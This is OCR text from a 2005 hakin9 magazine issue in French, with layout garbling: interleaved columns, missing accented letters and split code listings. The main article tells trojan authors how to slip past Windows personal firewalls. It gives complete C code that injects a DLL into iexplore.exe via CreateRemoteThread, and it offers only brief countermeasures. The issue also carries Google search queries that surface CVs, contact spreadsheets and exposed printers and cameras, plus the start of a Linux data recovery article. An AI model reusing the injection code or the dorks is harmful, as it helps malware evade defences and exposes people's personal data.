les camras disponibles via l'application WebcamXP
Server
les camras disponibles via l'application mmEye
les camras dotes de l'interface USB

Donnes personnelles des utilisateurs. Malheureusement, votre Curriculum Vitae envoy pour
Focus

et documents
confidentiels
Aussi bien que dans les pays fai-
sant parti de l'Union Europenne
qu'aux tats-Unis, il existe des
rgulations juridiques ayant pour
but de protger la confidentialit
il arrive que les diffrents docu-
ments confidentiels contenant
vos donnes soient mis dans des
endroits accessibles au grand pu-
blic ou envoys via le rseau sans
tre pour autant scuriss. Il suffit
donc que l'intrus obtienne l'accs
au courrier lectronique contenant
la recherche d'un emploi pour qu'il
connaisse votre adresse, votre nu-
mro de tlphone, votre date de
naissance, votre niveau d'tude,
vos centres d'intrts et votre exp-
rience professionnelle.
Sur le rseau, il y a plein de
documents de ce type. Pour les

32 www.hakin9.org hakin9 N o 4/2005


Figure 12. Un document confidentiel trouv par le moteur de recherche
Figure 13. Page de configuration de l'imprimante HP trouve par Google
trouver, il faut poser la question sui-
vante : intitle:"curriculum vitae"
"phone * * *" "address *" "e-mail".
Il est galement facile de trouver
des adresses sous forme de listes
de noms, de numros de tlphones
et d'adresses e-mail (Figure 11).
Cela rsulte du fait que presque
tous les utilisateurs d'Internet
crent diffrents types de carnets
d'adresses lectroniques ceux-ci
sont peu importants pour un intrus
moyen mais un manipulateur habile
(social engineering) sera capable
d'utiliser au mieux ces donnes,
hakin9 N o 4/2005
notamment si celles-ci concernent
les contacts dans le cadre d'une so-
cit. Dans ce cas, il est conseill
de taper la question : filetype:xls
inurl:"email.xls" permettant de
trouver des feuilles de calcul nom-
mes email.xls.
La mme situation concerne les
logiciels de messagerie instantane
et les listes de contacts enregistres.
Quand une liste de ce type tombe
entre les mains d'un intrus, celui-ci
pourra essayer de se faire passer
pour vos amis. Ce qui est intres-
sant, c'est qu'un grand nombre de
www.hakin9.org
Google hacking
donnes personnelles se trouvent
dans des documents officiels des
rapports de la police, des notes ju-
diciaires ou mme dans des cartes
de maladie.
Sur Internet, il y a galement des
documents privs possdant une
clause de confidentialit. Ce sont
des plans de projets, des documen-
tations techniques, de diffrentes
enqutes, rapports, prsentations
et beaucoup d'autres documents
utilisation interne. Il est facile de
les trouver car ils contiennent sou-
vent le mot confidential, la phrase
Not for distribution, etc. (voir la
Figure 12). Le Tableau 7 comprend
quelques questions concernant ces
documents souvent privs ou con-
fidentiels.
Tout comme dans le cas des
mots de passe, pour viter la divulga-
tion au public d'informations prives,
il faut rester prudent et surveiller
les donnes publies. Les socits
et les institutions doivent laborer
et mettre en uvre des rglementa-
tions appropries, des procdures,
des principes de scurit et prparer
son personnel pour faire face ce
problme.
Priphriques rseaux
Plusieurs administrateurs ne pren-
nent pas au srieux la scurit
des priphriques tels que les im-
primantes rseaux ou les camras
Web. Pourtant, une imprimante mal
scurise peut devenir la premire
cible attaquer par l'intrus qu'il
utilisera ensuite pour raliser des
attaques contre d'autres systmes
sur le rseau. Les camras Inter-
net ne sont pas trs dangereuses
et peuvent tre considres comme
un divertissement mais il n'est pas
difficile d'imaginer la situation o
les donnes de ce type auraient
de l'importance (une espiglerie
industrielle, un vol main arme).
Les questions sur les imprimantes
et les camras se trouvent dans le
Tableau 8 et la Figure 13 reprsente
la page de configuration de l'impri-
mante trouve sur le rseau. n
33
 Contourner discrtement
les pare-feux personnels
dans Windows
Mark Hamilton
S
upposons que vous ayez dvelopp
un cheval de Troie ou un logiciel de
ce genre. Malheureusement, vos vic-
times utilisent un pare-feu cens bloquer les
tentatives de connexion et mme dcouvrir
l'existence de cet outil (voir la Figure 1). Il vous
faut, d'une manire ou d'une autre, percer ce
systme de scurit.
Un pare-feu performant possde en g-
nral une fonction charge de sauvegarder
les rgles de scurit de sorte que l'utilisateur
n'ait pas tre inform chaque tentative de
connexion des outils obligs d'tablir des con-
nexions trs souvent comme les navigateurs,
les clients email, les filtres antispam, les mes-
sageries instantanes, etc. L'utilisateur accorde
ces permissions lorsqu'il pense que ce logiciel
est confidentiel et lorsqu'il sait qu'il va l'utiliser
trs souvent.
Pratique
Vous avez peut-tre dj devin notre
dmarche : il suffit de faire croire au pare-feu
que notre cheval de Troie n'est rien d'autre
qu'un nouveau programme pour lequel il
existe dj une permission. Qui aurait pu
croire qu'il tait possible de procder ainsi ?
Le programme appropri doit seulement ex-
cuter les fonctions de notre cheval de Troie,
de sorte qu'aucun pare-feu personnel exis-
34 www.hakin9.org
Nombreux sont les utilisateurs
d'Internet avoir recours
des pare-feux dits personnels,
comme Softwin BitDefender
ou Norton Personal Firewall.
Ces applications gnrent
des messages-guides lorsque
d'autres programmes tentent
d'tablir des connexions Internet
et bloquent de telles tentatives
si ces dernires ne sont pas
confirmes par l'utilisateur.
Toutefois, il existe tout au moins
une possibilit de contourner
discrtement de tels pare-feux.
tant puisse faire la diffrence entre ce que
notre programme et le programme autoris
font (le tout en notre faveur). Bien qu' priori
difficile, ce procd est relativement ais.
Tout ce dont nous avons besoin est fourni par
l'API de Windows.
Programmation d'un
contournement
Afin de contourner discrtement un pare-feu,
il vous suffit de regrouper les fonctions de votre
Cet article explique...
comment contourner les pare-feux personnels
sous Windows,
comment joindre des fils d'excution externes
aux processus.
Ce qu'il faut savoir...
il est ncessaire de matriser les bases du traite-
ment multi-tches,
vous connaissez idalement le modle de pro-
cessus MS Windows,
vous possdez idalement un niveau interm-
diaire dans la programmation WinAPI.
hakin9 N o 4/2005
 Contourner les pare-feux dans Windows

propos de l'auteur
Diplm d'informatique, Mark Hamil-
ton travaille comme consultant ind-
pendant en scurit pour le compte
de PME ainsi que de particuliers.
En plus de la neuroinformatique
et du grid computing, la scurit des
applications Web et des rseaux re-
prsentent les principaux domaines
de son activit. Le prsent article est
sa premire publication.

outil ncessitant une connexion en

Figure 1. Connexions non autorises bloques par un pare-feu
une seule fonction. Cette fonction
peut tre excute en tant qu'unique
fil d'excution (se reporter lEnca- Listing 1. La fonction CreateRemoteThread() prototype
dr intitul Windows, les processus
et les fils d'excution), lequel peut HANDLE CreateRemoteThread
(
tre joint de nouveau un autre pro-
HANDLE hProcess,
cessus d'excution (voir le Figure 2). LPSECURITY_ATTRIBUTES lpThreadAttributes,
L'API Windows propose une fonction SIZE_T dwStackSize,
trs utile : CreateRemoteThread() (voir LPTHREAD_START_ROUTINE lpStartAddress,
le Listing 1). LPVOID lpParameter,
DWORD dwCreationFlags,
Cette fonction a pour but de
LPDWORD lpThreadId
crer un fil d'excution fonctionnant );
dans l'espace d'adressage virtuel
d'un autre processus. Chaque ac-
tion de ce fil d'excution sera par fonction peut galement tre utili- article). En d'autres termes, votre
consquent interprte comme s'il se sur une base constructive, mais cheval de Troie doit chercher des
tait excut partir de son pro- nous ne l'utiliserons pas de cette processus htes appropris (voir le
cessus hte (remarquez que cette manire dans le cadre du prsent Tableau 1) puis joindre son fil d'ex-
cution l'un d'eux. Le fil d'excution
sera excut dans l'espace adresse
Windows, les processus et les fils d'excution de ce processus hte et, de ce fait,
Dans un pass rvolu, le systme d'exploitation MS Windows tait incapable
un pare-feu autorisera sa tentative
d'excuter plus d'un programme simultanment. C'est la raison pour laquelle ce
de connexion.
systme d'exploitation tait dit monotche. Avec le progrs, un nouveau modle
Au vue de ce que nous savons
appel multitche a t implment. En d'autres termes, il devenait possible
d'excuter plus d'un programme la fois dans la mesure o un processus repr- maintenant, notre programme doit
sentait l'instance d'un programme d'excution. La dure des calculs et l'espace tre capable de :
ddi la RAM ont d faire l'objet d'une partition puisque chaque processus
ncessite son propre calcul et sa propre RAM. Il est donc possible de comparer trouver des processus d'excu-
un processus une attribution du temps de calcul et de la RAM pour diffrentes tion appropris,
tches. joindre un fil d'excution l'un de
Toutefois, ce n'est pas le processus proprement parl qui excute les l- ces processus,
ments, mais les fils dits d'excution. Chaque processus dispose d'au moins un communiquer avec le fil d'excu-
fil d'excution charg d'excuter les commandes et de fonctionner dans l'espace
tion loign.
d'adressage virtuel de son processus hte (partie de la RAM attribue au pro-
cessus par le systme d'exploitation). Un processus peut disposer de plus d'un
Par ailleurs, le fil d'excution
fil d'excution. On appelle cette proprit le traitement multi-tches. Toutefois,
les fils d'excution ne peuvent exister sans un processus, qui reprsente une distance doit tre capable de com-
sorte d'habitat pour eux. En rsum, aucun processus n'a accs l'espace muniquer avec notre programme
adresse d'un autre processus, mais, depuis Windows NT, il est devenu possible, et d'tablir une connexion Internet.
pour quelque raison que ce soit, de dplacer un fil d'excution d'une section
de l'espace adresse vers une autre, mme dans l'espace adresse d'un autre Trouver les processus
processus, et d'excuter ce dernier ultrieurement. Voil ce que nous pouvons appropris
exploiter. Il existe deux possibilits de dtec-
ter une application : par le nom de

hakin9 N o 4/2005 www.hakin9.org 35

 son programme excutable ou par
le titre de sa fentre. Des mthodes
plus sres existent probablement
comme les fausses communications
avec ces processus, mais les deux
approches mentionnes ci-dessus
sont certainement les plus faciles.
Il vous faut toutefois bien dterminer
laquelle de ces mthodes utiliser
pour quel programme. Par exem-
ple, le titre de la fentre Internet
Explorer change pour chaque site
Web que nos victimes potentielles
visiteront (puisque c'est le mme
Figure 2. Fils d'excution joints des processus privilgis accepts par un
que le titre du site Web visit). Dans
pare-feu
ce cas, la dtection par les noms de
Tableau 1. Programmes les plus connus ayant recours des rseaux fentres est inutile, mais le nom du
utilisables comme applications htes fichier .exe (iexplore.exe) n'est vi-
demment pas modifi.
Programme Nom de l'excutable Version du programme Par ailleurs, tous les logiciels
htes adapts ne disposent pas
tous de fentre. La dtection par le
Internet Explorer iexplore.exe 6.0.0 nom .exe est donc la premire m-
Mozilla Firefox firefox.exe 1.0.3 thode envisager, en tant que m-
thode dfinitivement plus sre, mais
Netscape Navigator netscp.exe 7.1
il existe sans doute des program-
Opera opera.exe 8.0 mes dpourvus de nom fixe en .exe,
Mozilla mozilla.exe 1.7.6 et il serait donc utile de disposer
d'une autre mthode.
Mozilla Thunderbird thunderbird.exe 1.0
Afin de trouver l'ensemble des
Outlook Express msimn.exe 6.0 processus d'excution, vous pouvez
Outlook outlook.exe 9.0 avoir recours la fonction CreateTool-
help32Snapshot() propose par l'API
Eudora eudora.exe 6.2
de Microsoft Windows :
Pegasus Pegasus.exe 4.2
HANDLE WINAPI
ICQ icq.exe 5.0.5
CreateToolhelp32Snapshot(
ICQ Lite ICQLite.exe 2.0.3.4 DWORD dwFlags,
YIM yim.exe 6.0 DWORD th32ProcessID
);
AIM aim.exe 5.1
MSNM msnm.exe 7.0
Pour le premier paramtre DWORD
Miranda miranda32.exe 0.3 (Double Word), nous utiliserons
Trillian trillian.exe basic 3.1 TH32CS _ SNAPPROCESS, puisque
Spamihilator spamihilator.exe 0.9 nous ne voulons que des proces-
sus (et pas de fils d'excution !),
Shareaza shareaza.exe 2.1
pour le second, nous aurons re-
KaZaA kazaa.exe 3.0 cours la valeur 0 (celui-ci serait
Pratique

KaZaA Lite kazaalite.exe 2.6 ignor de toute faon). Ensuite,

eMule emule.exe 0.4.5 il est possible d'utiliser les fonc-
eDonkey edonkey.exe 0.5 tions Process32First() ainsi que
Process32Next() afin de scanner la
eDonkey 2000 edonkey2000.exe 1.1
copie d'cran et de rechercher les
BitTorrent BitTorrent-4.0.1.exe 4.0.1 noms en .exe appropris.
Azureus Azureus.exe 2.2 Il suffit dsormais de dterminer
WinMX WinMX.exe 3.5 le descripteur d'un processus parmi
tous les processus appropris

36 www.hakin9.org hakin9 N o 4/2005


(nous en avons besoin d'un pour
la fonction CreateRemoteThread()).
Il nous faut donc prendre un ID de
processus ou ProcessID (stock
galement l'intrieur de la copie
d'cran) puis, appeler la fonction
OpenProcess() afin d'obtenir un des-
cripteur de processus valide. Vous
trouverez dans le Listing 2 un exem-
ple de fonction qui tente d'ouvrir un
descripteur pour un processus
iexplore.exe.
Une copie d'cran de l'ensem-
ble des processus d'excution
est tout d'abord gnre puis son
accessibilit est contrle. La fonc-
tion cherche ensuite les processus
intituls iexplore.exe prsents
dans la copie d'cran au moyen
des fonctions Process32First()
et Process32Next(). supposer que
cette fonction trouve un processus
appropri, un descripteur de ce
processus en question sera finale-
ment ouvert au moyen de la fonc-
tion OpenProcess() (dans la mesure
o un accs complet au processus
est ncessaire, le drapeau PRO-
CESS _ ALL _ ACCESS est utilis). Si la
tentative aboutit, il est alors possi-
ble de joindre un fil d'excution ce
processus.
Afin de russir l'excution de
la fonction OpenProcess(), des
droits particuliers ne sont pas n-
cessaires tant que le processus
cible tourne sous le mme compte
utilisateur que celui de votre ap-
plication. En d'autres termes, tant
que l'utilisateur excute le proces-
sus cible, celui-ci peut tre inject
partir de votre application en
supposant que rien n'est venu mo-
difier les droits d'accs du proces-
sus, ce qui, bien sr, reprsente le
pire scnario.
Joindre le fil
d'excution au
processus hte
Nous disposons dsormais d'une
poigne valide pour le processus
appropri. Nous pouvons donc ten-
ter de joindre notre fonction de fil
d'excution (en anglais threadfunc-
tion) sous forme de fil d'excution
hakin9 N o 4/2005
Contourner les pare-feux dans Windows
Listing 2. Fonction tentant d'ouvrir un descripteur pour le processus
iexplore.exe
#include <windows.h>
#include <tlhelp32.h>
#include <stdio.h>
BOOL FindInternetExplorer( )
{
HANDLE hProcessSnap;
HANDLE hProcess;
PROCESSENTRY32 pe32;
hProcessSnap = CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 );
if( hProcessSnap == INVALID_HANDLE_VALUE )
{
return( FALSE );
}
pe32.dwSize = sizeof( PROCESSENTRY32 );
if( !Process32First( hProcessSnap, &pe32 ) )
{
CloseHandle( hProcessSnap );
return( FALSE );
}
do
{
if( strcmp( pe32.szExeFile, "iexplore.exe") == 0 )
{
hProcess = OpenProcess(PROCESS_ALL_ACCESS,FALSE,pe32.th32ProcessID);
if ( hProcess != NULL )
{
// Here we can attach our thread
}
CloseHandle( hProcess );
}
} while( Process32Next( hProcessSnap, &pe32 ) );
CloseHandle( hProcessSnap );
return( TRUE );
}
Listing 3. Exemple de fonction devant tre appele de l'intrieur mme
de l'application distante
#include <windows.h>
BOOL OnProcess( BOOL Attach )
{
TCHAR Filename[ MAX_PATH ] = { TEXT('\0') };
GetModuleFileName( NULL, Filename, MAX_PATH );
MessageBox( NULL, Filename,
Attach ? TEXT("Attach") : TEXT("Detach"),
MB_OK | MB_ICONINFORMATION | MB_TASKMODAL );
return TRUE;
}
BOOL WINAPI DllMain( HINSTANCE hinstDLL,
DWORD fdwReason, LPVOID lpvReserved )
{
switch( fdwReason )
{
case DLL_PROCESS_ATTACH:
return OnProcess( TRUE );
case DLL_PROCESS_DETACH:
return OnProcess( FALSE );
default:
return TRUE;
}
}
www.hakin9.org 37
 destin cette application. Cette
Listing 4. Dtermination du chemin absolu d'un fichier .dll fonction de fil d'excution doit tre
ModuleFileName[0] = TEXT('\0');
comprise dans une DLL (Dynami-
GetModuleFileName( NULL, ModuleFileName, MAX_PATH ); cally Linked Library). Le Listing 3
FileName = &ModuleFileName[lstrlen( ModuleFileName )]; prsente un exemple de fonction
while ( FileName > &ModuleFileName[0] qui sera appele de l'intrieur
&& FileName[0] != TEXT('\\') && FileName[0] != TEXT('/') )
mme de l'application distante.
FileName--;
if ( FileName[0] != TEXT('\0') )
Cette fonction a pour but d'afficher
FileName++; une bote de message lorsque le fil
lstrcpy( FileName, TEXT("test.dll") ); d'excution est amorc et stopp.
La procdure prcise n'est pas trs
intressante. Le fichier .dll en ques-
Listing 5. Implmentation de la fonction CreateRemoteThread() tion est intitul test.dll et se trouve
dans le mme rpertoire que notre
hRemoteThread = CreateRemoteThread( hProcess, NULL, 0, fichier excutable. Le code ex-
(LPTHREAD_START_ROUTINE)GetProcAddress(
pos dans le Listing 3 est complet,
GetModuleHandle( TEXT("kernel32.dll") ),
#ifdef UNICODE
il vous suffit de le compiler en tant
"LoadLibraryW"), que DLL. La procdure qui permet
#else d'accomplir la compilation change
"LoadLibraryA"), d'un IDE (Environnement de Dve-
#endif
loppement Intgr) l'autre, mais
RemoteFileName, 0, NULL );
il est assez judicieux de chercher
une entre du menu appele New
Listing 6. Dchargement du code afin d'viter une exception de DLL file ou portant un autre nom de
violation d'accs ce genre.
La fonction DllMain() a pour ob-
WaitForSingleObject( hRemoteThread, INFINITE ); jectif de contrler si le fil d'excution
GetExitCodeThread( hRemoteThread, (LPDWORD)&RemoteModule ); a bien t joint ou pas et d'afficher
hRemoteThread = CreateRemoteThread( hProcess, NULL,
une bote de message en appelant
0, (LPTHREAD_START_ROUTINE)GetProcAddress(
GetModuleHandle( TEXT("kernel32.dll") ), "FreeLibrary"), la fonction OnProcess() qui a recours
RemoteModule, 0, NULL ); la fonction MessageBox() pour af-
ficher le message Attach (joint) ou
Detach (dttach).
Listing 7. Programme intgral charg de joindre des fils d'excution Une fois toutes ces prpara-
une application hte tions termines, nous pouvons
enfin tenter d'injecter ce fichier .dll
#include <windows.h> dans le processus hte. Pour ce
#include <tlhelp32.h>
faire, il nous faut attribuer une page
#include <stdio.h>
BOOL AttachThread( );
de mmoire au processus cible
int main( ) pour notre code au moyen de Vir-
{ tualAllocEx(), crire le code dans
AttachThread( ); la mmoire cible grce WritePro-
}
cessMemory() et enfin excuter Crea-
BOOL AttachThread( )
teRemoteThread() avec les donnes
{
HANDLE hProcessSnap; ainsi rassembles. Par ailleurs, les
HANDLE hProcess; variables suivantes doivent tre
PROCESSENTRY32 pe32; dclares :
DWORD dwPriorityClass;
Pratique

LPVOID RemoteFileName;
TCHAR ModuleFileName[MAX_PATH];
LPVOID RemoteFileName,
LPTSTR FileName; TCHAR ModuleFileName[MAX _ PATH],
HANDLE hRemoteThread; LPTSTR FileName,
HINSTANCE RemoteModule; HANDLE hRemoteThread,
hProcessSnap = CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 );
HINSTANCE RemoteModule.
if( hProcessSnap == INVALID_HANDLE_VALUE )
{
Suite sur la page suivante
La variable intitule RemoteFileName
est ncessaire pour attribuer de
la mmoire RAM, et les variables

38 www.hakin9.org hakin9 N o 4/2005


ModuleFileName et FileName sont
requises afin d'identifier le chemin
absolu de la DLL. La variable hRe-
moteThread contiendra le descrip-
teur de notre fil d'excution distant
et enfin la variable RemoteModule
prsentera l'instance du fichier DLL
distant.
Nous aurons recours, en tant
que descripteur de processus, la
variable hProcess dj voque dans
le Listing 2. Il nous faut en premier
lieu dterminer le chemin absolu du
fichier .dll (voir le Listing 4).
Le chemin complet de notre
propre cheval de Troie est identifi
au moyen de la fonction GetModu-
leFileName(). En rgle gnrale,
le nom d'un fichier DLL est dter-
min au moyen de cette fonction.
Toutefois, puisque nous utilisons
la valeur NULL pour le premier
paramtre (charg de prsenter le
module que nous cherchons), cette
fonction retourne le chemin vers
notre application. Le deuxime
paramtre est charg de dfinir
la variable qui reoit la valeur, le
troisime reprsente la taille de
la mmoire tampon utilise pour
le nom du fichier. Vous devriez
maintenant obtenir quelque chose
du genre C:\chemin\au\notre\
fivchier.exe. Comme il est nces-
saire d'obtenir le chemin pour notre
fichier .dll (situ dans le mme r-
pertoire que le fichier excutable),
il faut chercher la premire barre
oblique inverse au sein de la va-
riable ModuleFileName de droite
gauche (de manire connatre
la position partir de laquelle d-
bute le nom du fichier) puis rem-
placer le nom de l'application .exe
par le nom de notre fichier DLL
afin d'obtenir une valeur du genre
C:\chemin\au\notre\test.dll.
Puis, il faudra attribuer une page
de mmoire dans le processus cible
de la manire suivante :
RemoteFileName = VirtualAllocEx(
hProcess, NULL, MAX_PATH,
MEM_COMMIT, PAGE_READWRITE);
Le premier paramtre reprsente
la poigne du processus. Ensuite,
hakin9 N o 4/2005
Contourner les pare-feux dans Windows
Listing 7. Programme intgral charg de joindre des fils d'excution
une application hte (suite)
return( FALSE );
}
pe32.dwSize = sizeof( PROCESSENTRY32 );
if( !Process32First( hProcessSnap, &pe32 ) )
{
CloseHandle( hProcessSnap );
return( FALSE );
}
do
{
if( strcmp(pe32.szExeFile,"iexplore.exe") == 0 )
{
hProcess = OpenProcess(
PROCESS_ALL_ACCESS,FALSE,
pe32.th32ProcessID);
if ( hProcess != NULL )
{
RemoteFileName = VirtualAllocEx(
hProcess, NULL, MAX_PATH,
MEM_COMMIT, PAGE_READWRITE);
if( RemoteFileName )
{
ModuleFileName[0] = TEXT('\0');
GetModuleFileName( NULL, ModuleFileName, MAX_PATH );
FileName = &ModuleFileName[lstrlen( ModuleFileName )];
while ( FileName > &ModuleFileName[0] && FileName[0] != TEXT('\\')
&& FileName[0] != TEXT('/') )
FileName--;
if ( FileName[0] != TEXT('\0') )
FileName++;
lstrcpy( FileName, TEXT("test.dll") );
if( WriteProcessMemory(
hProcess, RemoteFileName,
ModuleFileName, MAX_PATH, NULL ) )
{
hRemoteThread = CreateRemoteThread( hProcess,
NULL, 0, (LPTHREAD_START_ROUTINE)GetProcAddress(
GetModuleHandle( TEXT("kernel32.dll") ),
#ifdef UNICODE
"LoadLibraryW"),
#else
"LoadLibraryA"),
#endif
RemoteFileName, 0, NULL );
WaitForSingleObject( hRemoteThread, INFINITE );
GetExitCodeThread( hRemoteThread, (LPDWORD)&RemoteModule );
hRemoteThread = CreateRemoteThread( hProcess,
NULL, 0, (LPTHREAD_START_ROUTINE)GetProcAddress(
GetModuleHandle(
TEXT("kernel32.dll") ), "FreeLibrary"),
RemoteModule, 0, NULL );
VirtualFreeEx( hProcess, RemoteFileName, 0, MEM_RELEASE );
CloseHandle(hRemoteThread);
}
}
}
CloseHandle( hProcess );
}
} while( Process32Next( hProcessSnap, &pe32 ) );
CloseHandle( hProcessSnap );
return( TRUE );
}
www.hakin9.org 39
 l'adresse de dmarrage est dfinie
(comme nous utilisons la valeur
NULL, la fonction se charge de d-
terminer la rgion d'attribution no-
tre place). Le troisime paramtre
dfinit la taille de la rgion dans la
mmoire attribuer (en octets, que
nous souhaitons tre la plus grande
possible bien sr) puis le type d'at-
tribution de mmoire est paramtr
(d'autres possibilits consisteraient
utiliser MEM _ RESET et MEM _ RESER-
VE , mais pas dans notre cas). Enfin,
la protection de la mmoire dans la
rgion des pages devant tre attri-
bues est galement paramtre LoadLibraryW et LoadLibraryA). Le
PAGE _ READWRITE nous donne un
accs la fois en mode lecture
et criture.
Ensuite, il faut crire le code
dans la mmoire cible, de la manire
suivante :
WriteProcessMemory(
hProcess, RemoteFileName,
ModuleFileName, MAX_PATH,
NULL );
Encore une fois, le premier param-
tre est charg de dfinir le descrip-
teur du processus. Le deuxime a
pour but de prsenter un pointeur
vers l'adresse de base situe dans
le processus indiqu pour lequel les
donnes sont crites (conformes
la valeur de retour de la fonction
VirtualAllocEx()) et le troisime
paramtre reprsente un pointeur
dirig vers la mmoire tampon
et contenant les donnes qui doi-
vent tre crites dans l'espace
adresse (qui a t dfini en pre-
mier). Ensuite, le nombre d'octets
crire est pass et la dernire GetModuleHandle().
tape consiste dfinir un pointeur
dirig vers une variable qui recevra
le nombre d'octets transfrs (bien
que nous ne l'utilisons pas).
Pratique
Et voici le moment de vrit.
Il est enfin possible d'excuter le
code partir de l'intrieur mme du
processus distant. Nous utilisons par
consquent la fonction CreateRemo-
teThread() (voir le Listing 5).
Nous repassons tout d'abord
la poigne du processus. Le
deuxime paramtre reprsente
40
un pointeur dirig vers une struc-
ture d'attributs de scurit (que
nous n'utilisons pas), le troisime
a pour but de dfinir la taille de
la pile initiale en octets (comme
nous utilisons la valeur 0, la taille
par dfaut de l'excutable est uti-
lise). Puis, le pointeur dirig vers
notre fonction de fil d'excution est
identifi au moyen de la fonction
GetProcAddress() et pass vers
la fonction alors que vous devez
contrler si la compilation du code
a t ralise en UNICODE ou en
ANSI (il s'agit de la diffrence entre
sixime paramtre reprsente un
pointeur vers une variable passe
dans notre fil d'excution. L'avant
dernier paramtre est charg de
prsenter un drapeau de cration
(il est possible de paramtrer le
drapeau CREATE _ SUSPENDED afin
de dmarrer le fil d'excution sus-
pendu). Le dernier paramtre est
un pointeur dirig vers une variable
charge de recevoir l'identifiant du
fil d'excution (inutilis dans notre
cas). C'est tout ce qu'il faut pour
que le code s'excute !
Il faut toutefois le dcharger de
nouveau, au risque de dclencher
une exception de violation d'accs
au moment o le processus cible
se fermera (voir le Listing 6). Il faut
d'abord attendre que notre fil d'ex-
cution existe pendant une priode de
temps dite INFINITE puis dterminer
le ExitCode du fil en question. Il est
ensuite possible de le dcharger en
passant ExitCode dans la fonction
CreateRemoteThread() et en utilisant
FreeLibrary au sein de la fonction
Vous trouverez dans le Listing 7
l'application que nous venons d'cri-
re dans son intgralit.
Communication entre
le fil d'excution
distant et notre
application
Les possibilits de communiquer
avec une autre application, un
autre fil d'excution ou un autre
processus sont innombrables.
www.hakin9.org
Mais, dans la mesure o chacune
de ces mthodes est d'une com-
plexit incroyable mme la pr-
sentation des principes de base
Memory Mapped Files disponible
sur le site MSDN ne prend pas
moins de 14 pages il est impossi-
ble de les dcrire dans le cadre du
prsent article. Toutefois, en voici
un bref rsum.
Le message WM_COPYDATA
Une application envoie le message
WM _ COPYDATA afin de passer des
donnes vers une autre applica-
tion. Pour envoyer ce message, la
fonction SendMessage() est utilise.
Il faut donc tre attentif aux don-
nes ainsi passes, et veiller ce
qu'elles ne comportent ni pointeurs
ni rfrences des objets inacces-
sibles par l'application qui reoit les
dites donnes. Lorsque le message
est en cours d'envoi, les donnes
rfrences ne doivent pas tre
modifies.
Memory Mapped Files (MMF)
Par Memory Mapped Files, on
dsigne des fichiers pouvant tre
projets dans l'espace adresse
d'un ou plusieurs processus. De
cette faon, la communication inter-
processus devient possible, mais
est toutefois limite aux processus
fonctionnant sous le mme systme.
Les communications rseau ne sont
pas ralisables (ce qui est le cas
pour les canaux de communication
nomms).
Named Pipes
On entend par named pipes l'ex-
tension du concept d'un tube sous
les systmes UNIX (galement
possible, bien entendu, sous les
systmes Windows). Il s'agit de
l'une des mthodes utilise pour la
communication inter processus. La
conception de tubes nomms est
identique la communication du
type client-serveur. Ces canaux ne
sont pas permanents et ne peuvent
pas tre crs en tant que fichiers
spciaux. Les tubes nomms ne
sont que trs rarement remarqus
par les utilisateurs.
hakin9 N o 4/2005
La mmoire partage
La mmoire partage est une
variante de la communication
inter processus trs efficace. Un
programme cre une part de la
mmoire accessible par d'autres
processus. Toutefois, cette m-
thode est l'une des plus complexes
implmenter par rapport aux
autres.
Contre-mesures
Faire simple dans ce domaine re-
lve vraiment du dfi. Il semble qu'il
n'existe ce stade aucune solution
pertinente pour rsoudre ce pro-
blme. Donc si par tout hasard vous
avez une ide de gnie, n'hsitez
pas de la publier. Voici ci-dessous
quelques pistes, non satisfaisantes
toutefois.
Mthodes de protection
du ct utilisateur
Vous, en tant qu'utilisateur, pouvez
vous protger en veillant ne pas
crer des permissions perptuel-
les. Par ailleurs, certains pare-feux
autorisent des connexions sur tous
les ports si vous acceptez qu'un
port particulier fasse office de
standard. Il vous faut alors para-
mtrer les ports manuellement
pour obtenir des rgles de scurit
plus performantes par exemple,
votre client E-mail utilise les ports
110 et 25. Il ne faut donc autoriser
que ces ports dans votre rgle de
scurit ; certains utilisent d'autres
ports, mais vous pouvez toutefois
utiliser ces ports de manire spci-
fique pour les rgles de scurit de
votre pare-feu. Mais, mme avec
ces mesures de prcaution, il est
encore trs difficile de savoir si
une tentative de connexion issue
d'un processus inject est normale
ou pas. Comme vous le savez d-
sormais, la tentative de connexion
agit comme si elle manait de ce
processus.
Sur Internet
http://www.msdn.microsoft.com The Microsoft Developer Network,
http://www.winapi.org le site consacr la programmation sous Windows.
hakin9 N o 4/2005
Mthodes de protection du
ct de l'application hte
Ce genre de protection est pos-
sible en thorie, mais semble
inapplicable dans la pratique. La
meilleure approche et la moins
plausible galement est une
fonction d'autoprotection dont
chaque application hte doit tre
dote. Cette fonction a pour but
de veiller ce qu'il n'y ait aucun fil
d'excution tranger fonctionnant
dans l'espace adresse virtuel de
l'application, et est mme capable
de stopper de tels fils d'excu-
tion (ainsi que les menaces dont
ils sont porteurs). L'inconvnient
d'une telle fonction est que chaque
dveloppeur de logiciel devrait
implmenter une fonctionnalit as-
similable dans son produit (puisque
c'est le seul savoir si un fil d'ex-
cution est non dsir ou pas, ce qui
rend impossible le dveloppement
d'une application capable de scan-
ner n'importe quel processus clas-
sique pour contrer des injections
malveillantes).
Conclusion
Ce qui est en tout cas vident, c'est
qu'il est encore difficile de se pro-
tger contre les attaques bases
sur de telles injections. Toutefois,
il existe un pare-feu, appel Tiny,
capable de dtecter ces piratages
en interceptant les appels issus de
le fonction CreateRemoteThread(),
mais aucun pare-feu n'est par-
fait, et mme Tiny est incapable
de vous indiquer si une injection
ainsi dtecte est rellement mal-
veillante ou au contraire utile. Pour
de plus amples informations sur les
fonctions utilises lors de cette d-
monstration, je vous recommande
de consulter le site de MSDN o
chaque fonction de l'API Windows
y est illustre. n
www.hakin9.org 41
 Rcupration des donnes
partir des systmes de
fichiers Linux
Bartosz Przybylski
V
otre serveur a t victime d'un pira-
tage. L'intrus tait si malicieux qu'il a
supprim plusieurs fichiers importants
sur votre disque dur, y compris le programme
que vous labor depuis plusieurs mois. Avant
de rinstaller le systme (afin d'liminer du
code malin laiss par l'intrus), il serait bien de
rcuprer les donnes. Pour cela, vous pourrez
utiliser les outils disponibles dans chaque dis-
tribution Linux.
Outils ncessaires
Le premier lment indispensable est un jeu
d'outils permettant de travailler sur les syst-
mes de fichiers ext2 et ext3 il s'agit ici du pa-
quet e2fsprogs. Pour vous, le plus important est
debugfs, qui comme son nom l'indique sert
dboguer le systme de fichiers. Par dfaut
Pratique
(pour la plate-forme x86), le paquet entier est
install avec le systme d'exploitation.
L'outil suivant est reiserfsck, il fait partie
du paquet reiserfsprogs, qui sert diter le
systme de fichiers ReiserFS. Ce paquet doit
tre inclus aussi dans le systme. Quant au
programme dd, il vous servira rcuprer une
partition entire avec le systme de fichiers
ReiserFS et sera une alternative pour rcuprer
42 www.hakin9.org
